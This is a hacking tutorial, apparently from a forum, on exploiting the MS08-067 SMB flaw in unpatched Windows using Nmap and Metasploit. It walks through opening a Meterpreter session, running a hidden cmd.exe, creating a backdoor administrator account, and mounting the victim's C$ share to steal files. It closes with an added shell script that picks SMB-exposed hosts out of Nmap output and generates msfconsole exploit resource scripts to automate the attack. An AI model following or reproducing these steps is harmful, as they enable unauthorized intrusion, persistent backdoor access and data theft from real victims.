Have you ever wondered how you could log in as an Administrator, create your own account and get any files you want from a remote computer? Well, here's how:
Q: On which Windows versions can the hack be done?
A: - Windows 2000 SP4
- Windows XP SP1/SP2
- Windows XP Pro x64
- Windows Server 2003 SP1
- Windows Server 2003 x64
The one thing they all need in common: the MS08-067 patch (KB958644) must NOT be installed. A patched box is not exploitable with this, no matter the version.
Q: From and to what OS are we attacking?
A: We are attacking from Debian Linux; the target is Windows XP SP2.
- Download Nmap (nmap.org) so that we can scan the remote PC.
- In the terminal type: nmap -sS -O <target ip> (the SYN scan and OS detection both need root, so run it with sudo).
- If ports 139/TCP and 445/TCP are open, everything is exactly as we want it: those are NetBIOS session and SMB, and the MS08-067 bug in the Server service is reached over SMB.
- Now download Metasploit (metasploit.org) and start its console (msfconsole) from the terminal.
- Now that Metasploit is running we start the attack.
- Type "show exploits" to get a list of the available exploits.
- We choose the exploit "ms08_067_netapi" by typing "use windows/smb/ms08_067_netapi".
- Now set RHOST to the victim's IP: "set RHOST <target ip>"
- And RPORT to 445: "set RPORT 445"
- Now type "set SMBPIPE SRVSVC" and hit ENTER (the module defaults to the BROWSER pipe, SRVSVC is the alternative), then "set TARGET 0" and hit ENTER again (target 0 is Automatic Targeting, which fingerprints the OS and language for you).
- OK! Let's set the payload: "set PAYLOAD windows/meterpreter/bind_tcp". A bind payload listens on the target and we connect in, so it fails if the target's firewall blocks inbound connections; "windows/meterpreter/reverse_tcp" with LHOST set to our own IP is the alternative in that case.
- IT'S TIME TO HACK THE COMPUTER!!!! Type "exploit" and hit ENTER.
- If everything is OK you should see a message like: "[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:xxxx -> xxx.xxx.xxx.xxx:xxxx)"
- Meterpreter is running. We are inside the target PC!
- Let's open the target's CMD: "execute -f cmd.exe -c -H -i" (-c channelizes the I/O so we can talk to it, -H hides the window from anyone sitting at the console, -i interacts with it straight away).
- If the prompt shows the Windows system directory (e.g. C:\WINDOWS\system32>) then the mission is accomplished.
- Now let's create our own admin account.
- Type: "net user n0f4t3 mypass /add". You should see the confirmation message "The command completed successfully."
- Now let's make the account an admin: "net localgroup administrators n0f4t3 /add".
- You should see the same confirmation again: "The command completed successfully."
- Then type "exit" to leave CMD. (The account name n0f4t3 and the password mypass are just the ones used in this tutorial; pick your own, but remember them for the next part.)
- OMG!! We made it!!! But how do we steal his files?
- We boot into Windows...
- Go to "Start > Run", type "cmd" and hit ENTER.
- Then type "net use X: \\<target ip>\C$ mypass /user:n0f4t3" and hit ENTER. C$ is the hidden administrative share of the C: drive; it exists by default and is only open to administrators, which is exactly why we made our account one. ("\\<target ip>\C" or "\\<target ip>\C:" will not work: there is no share by that name unless somebody created one.)
- If it still fails, the likely reason is that the target is Windows XP with Simple File Sharing turned on, which forces every network logon with a local account to Guest and refuses the admin shares. In that case just use the Meterpreter session you already have: its "download <file>" command pulls files straight off the target.
- Now go to "My Computer" and you should see a new drive called X:. Open it and enjoy the victim's files.
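The scan-and-exploit steps above, wrapped into one script so the whole sequence is repeatable. This is an added example and not part of the original tutorial: it takes Nmap's grepable (-oG) output, keeps only the hosts where both 139/tcp and 445/tcp are open, and prints an msfconsole resource script with exactly the module settings set by hand above (save it and run it with msfconsole -r <file>). The IP addresses and the scan output embedded in it are constructed sample data, and the function names smb_exposed and msf_rc are my own.

```shell
#!/bin/sh
# Added example, not from the original tutorial: script the scan-and-exploit
# steps. Finds hosts with 139/tcp and 445/tcp open in nmap -oG output and
# emits an msfconsole resource script with the same settings typed above.

# Constructed sample of `nmap -sS -p 139,445 -oG -` output (real output
# separates the fields with tabs; awk splits on any whitespace, so spaces
# are used here to keep the sample copy-paste safe). 192.0.2.15 has both
# SMB ports open, .16 only 139, .17 is down.
NMAP_SAMPLE='# Nmap 4.76 scan initiated (constructed sample)
Host: 192.0.2.15 ()  Status: Up
Host: 192.0.2.15 ()  Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///  Ignored State: closed (1711)
Host: 192.0.2.16 ()  Status: Up
Host: 192.0.2.16 ()  Ports: 139/open/tcp//netbios-ssn///, 445/closed/tcp//microsoft-ds///
Host: 192.0.2.17 ()  Status: Down
# Nmap done: 3 IP addresses (2 hosts up) scanned'

# smb_exposed: read grepable nmap output on stdin, print one IP per line for
# every host whose Ports: line lists both 139/open/tcp and 445/open/tcp.
smb_exposed() {
    awk '/^Host: / && /Ports: / {
        has139 = ($0 ~ /[ ,]139\/open\/tcp/)
        has445 = ($0 ~ /[ ,]445\/open\/tcp/)
        if (has139 && has445) print $2
    }'
}

# msf_rc TARGET [PAYLOAD] [LHOST]: print an msfconsole resource script that
# reproduces the manual "use / set / exploit" sequence from the tutorial.
# PAYLOAD defaults to the bind shell used above; give a reverse_* payload
# plus your own IP as LHOST when the target's firewall blocks inbound.
msf_rc() {
    target="$1"
    payload="${2:-windows/meterpreter/bind_tcp}"
    lhost="$3"
    printf 'use exploit/windows/smb/ms08_067_netapi\n'
    printf 'set RHOST %s\n' "$target"
    printf 'set RPORT 445\n'
    printf 'set SMBPIPE SRVSVC\n'
    printf 'set TARGET 0\n'
    printf 'set PAYLOAD %s\n' "$payload"
    if [ -n "$lhost" ]; then
        printf 'set LHOST %s\n' "$lhost"
    fi
    printf 'exploit\n'
}

# Offline demo on the constructed sample. Against a real network you would
# feed it `nmap -sS -p 139,445 -oG - <range>` instead (-sS needs root).
printf '%s\n' "$NMAP_SAMPLE" | smb_exposed | while IFS= read -r ip; do
    echo "# --- ms08_067_$ip.rc (run with: msfconsole -r ms08_067_$ip.rc)"
    msf_rc "$ip"
done
```

Only 192.0.2.15 survives the filter: .16 has 139 open but 445 closed, and .17 never reports a Ports: line. Against a live network, replace the sample with the real nmap pipe, and pass a reverse payload and your LHOST as the second and third arguments to msf_rc when a bind shell is blocked by the target's firewall.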
That’s all Folks!!!
Credits:
- Microsoft, for this great exploit!!
- Metasploit and Nmap.
- Me (N0F@T3) for writing this tut.
- MinSteRexS for posting an update!